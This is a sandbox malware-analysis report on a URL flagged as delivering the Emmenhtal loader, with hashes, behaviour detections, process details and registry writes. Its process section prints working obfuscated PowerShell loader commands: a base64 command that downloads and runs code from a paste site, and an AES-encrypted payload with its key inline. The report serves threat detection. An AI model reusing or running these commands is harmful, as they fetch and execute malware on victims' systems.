URL:

https://www.iaio-official.org/

Full analysis: https://app.any.run/tasks/5ea44cbb-89b4-4899-918d-c9f6b80fffd8
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Malware Trends Tracker     >>>
Analysis date: December 14, 2024, 08:23:47
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
obfuscated-js
emmenhtal
loader
Indicators:
MD5:

0EB6C4E27667E99BF0712194DC70E522

SHA1:

D3750E4B4A7D9EE17EB5F19D81222246577EE87F

SHA256:

1AC9E01A918769B3ECF7B37E31B7792B63B846A0C0D63E7734B619C37A60340A

SSDEEP:

3:N8DSLtUGMJ:2OLiGW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 4120)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6096)
      • powershell.exe (PID: 4120)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4120)

    • Executing a file with an untrusted certificate

      • VCDDaemon.exe (PID: 6196)

  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6096)
      • powershell.exe (PID: 4120)

    • Executes script without checking the security policy

      • powershell.exe (PID: 4120)
      • powershell.exe (PID: 448)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 6096)
      • powershell.exe (PID: 4120)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6096)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 4120)
      • powershell.exe (PID: 448)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 4120)

    • Application launched itself

      • powershell.exe (PID: 4120)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 4120)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6016)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 6016)
      • powershell.exe (PID: 448)

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 448)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 6448)

    • Reads Environment values

      • identity_helper.exe (PID: 8084)

    • Reads the computer name

      • identity_helper.exe (PID: 8084)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6096)

    • Checks supported languages

      • identity_helper.exe (PID: 8084)
      • csc.exe (PID: 6016)
      • cvtres.exe (PID: 4804)
      • VCDDaemon.exe (PID: 6196)

    • The process uses the downloaded file

      • mshta.exe (PID: 6096)
      • powershell.exe (PID: 4120)
      • powershell.exe (PID: 448)

    • Connects to unusual port

      • msedge.exe (PID: 6824)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)
      • powershell.exe (PID: 448)

    • Manual execution by a user

      • powershell.exe (PID: 7688)

    • Checks proxy server information

      • mshta.exe (PID: 6096)
      • powershell.exe (PID: 448)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 6016)

    • Create files in a temporary directory

      • csc.exe (PID: 6016)
      • cvtres.exe (PID: 4804)

    • Disables trace logs

      • powershell.exe (PID: 448)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 448)

    • The sample compiled with english language support

      • msedge.exe (PID: 7936)

    • The executable file from the user directory is run by the Powershell process

      • VCDDaemon.exe (PID: 6196)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
194
Monitored processes
63
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs mshta.exe #EMMENHTAL powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs csc.exe cvtres.exe no specs vcddaemon.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
448"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7812 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2996"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7024 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3128"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3084 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3608"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1568 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3652"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4120"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E9E45881734D627572BBB24767BF9105E290AED4FD0AD07E069C341D94CD9D253482474A2AFEACE895331A6A7C2344244D9883CB83DB04E20F24E807A0C42FAD54148764C3B647F7B86743F03E946F8ABAA4037DF00724040C58C639B64617CEC513964C0AEB7450990964F332CA73B69AE563F357EFE71A45ADB76F5F1F74B9EA094EDB014AF7DE3832D006B489635D35933F45D8722789F646F6B34118D96044BF40BB9C6D5C235CC72225C1E2FF06D17FFCF3119AC497D69763C1EA4752D9DF918E3F7BC1F5DA270F722684C1062428E1B4B4DFAC9D4B8A3AA2FED312CDC55749F56329AABB058B493B229AFE6188C2CD6E5EF7D4615BAC6C376F0A1C60BE569EDE1D7D229C0A409E716C9881B8ED8A6AF7DFF8E51394FE00530F124BF25F72F1BB0C40D8756D4DC53C99C7706F76566458303AD17ABA13977CBB9D9E8E0D6A23C3AC29863BA5C05EC614C2DC13F1D86D3E8B6E32547054893B928DAF467A0E285FEB70CD8521F803FA7DCB6E68597E4F10DC19975F6A9FA3BB73D000E25D904399788A042CCB2A8ACEBC94D9F7176B6C42A8ADF53E078B0DB3D1DB4FA018C20200519D0C6BDAD8C667BC081BB6E98837F869A01FCB4F5BFA3FF6B9DA59A6CC6F14874D12DA9C94A924E23E1C9A2F10B24B2C808A191CAEF430B6BCCDB8ECC67C81EBDF1946F84922DD6237AD44AA75DAE5B417CBC7F1935089D115B32E7BEA92467DF4B34887940BE275A826DCBE8FBCD8572CF31DFF6137DA4FA652F60A4C96E8EE7084DF2015478E3BD67EDD0BDFB00AF09D7DE181E5AA043DE6F0FC38EB1345B172BB996F129E450352658040763C3FD33D898F576ED092EBE78EB3CE7A76AC530782DAFA0D77E713A4D141695047421A84E93C5C6879D829FA96C6E0E217D62FECC4DD0FB16426652883165B9360C91E805AD040FAF4EA2E2740FA5E9E6F3AE24428D754B4AB2A539E552C98664EEC4BE0178F55FEA933EF0A6B79A49D0F87E95E22DDD03EA3EDFBFAABE60356A7A00DA80A4B13179CF6AD7A4055AAFC41FD0B8B3D8EFA93BC1117E123BD77B17F73F8C6E2EE3D01BFDBEEC94A9522C0A1A5E63506CC7F53BB9BC8DF54090B9989982A1686806E7CBC8FFCDD27577A949E1959B8D7B4B07DD342D475CFBCCE589EECF4466070B9CA53B749253301F99A3C0084ABDFB98EB91E40D1B32895AAE86DCA9CA7B851F00477324B25F71DE93C8B9BB13C56A76F42A26ED97C0915187E6F5B6FC54C40843167185BE51622CE24F901B16B435C2DDA0A5401210B6984C5C3BE6C2335BE875BFAA261EB865AD3D047FBD55B975D9733284ABA3143900958E64193E0A4FAEB858C56D772D7108BA4829F9ECAB503E0C6BF8A807447723CA7C4417C128182FE0DC0B420E8B7C1B18A137C48E31AC0E4E723CF849010F8A2937C1D119B207B22A30AB798DB13ACF4BD7E3FEC18AE6693BBD9FFA6017F2BB4A8BCDE923FAD4066B7438E54189066A0E5BE7FD3EA4AD53AE465432AA738EF4A7176ED78829C803418AD7B3FFDF34DA80F24901748099068BAD20F0B6C75D5CBFAE57169CFA3A63A30790041DACF0733B7A61EA68B6DB4BAA3832C2FD159B1181AA974048F90B196471D825E638D56773F684475EB8211E807A21E574D6A5F63D923A169C4621973867E9B1FC18CC72C11E65C8077634918704FBDF878CAD8411014CA1319BCC88017DC5D930D43F0A3AB7E96D711475123876D8DF4F97924CAB0F392C26647152892055A197E9E15E9ADC078BFDF053C973F4F43CF80CC2846AC337DB1CDF4C600FB6B7F44919C555861CEBAD623302738419EF1F8C12A52E4B356B75E6B79DEBB7E9967E592F3D5F9BBEFEA63B88F6545FE25D9BE8AAF6640FC7F9A623282BD4A790F5BF18A8BE05A6D7860997549B97DA3E886EC6FF35A01AF07E844664A44EF19C5476FA04B41688491C9F8396B3D8BC34EF0AE26A77236FE6A64AEC24F73831D893CCC31663593FE27BE686C8BA');$LZbV=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((WXndL('61597869676545424D6F537659656151')),[byte[]]::new(16)).TransformFinalBlock($Ggxu,0,$Ggxu.Length)); & $LZbV.Substring(0,3) $LZbV.Substring(305)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4640"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7832 --field-trial-handle=2232,i,1849305339356975829,9165938231248847892,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
21 387
Read events
21 343
Write events
44
Delete events
0

Modification events

(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(6448) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
65365CF3CC872F00
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328362
Operation:writeName:WindowTabManagerFileMappingId
Value:
{3E3B511B-B086-4EA6-A442-59C03F682645}
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328362
Operation:writeName:WindowTabManagerFileMappingId
Value:
{973BE4AC-285A-432E-B700-68AFDBF90D99}
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328362
Operation:writeName:WindowTabManagerFileMappingId
Value:
{71C52C7E-0FFA-463D-9489-CDC2727C2BDB}
(PID) Process:(6448) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328362
Operation:writeName:WindowTabManagerFileMappingId
Value:
{23C1E8BE-1152-4893-AC11-7A01F94EC400}
(PID) Process:(6448) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
39206EF3CC872F00
Executable files
11
Suspicious files
433
Text files
132
Unknown types
9

Dropped files

PID
Process
Filename
Type
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF13516f.TMP
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF13516f.TMP
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF13516f.TMP
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF13517e.TMP
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
6448msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF13518e.TMP
MD5:
SHA256:
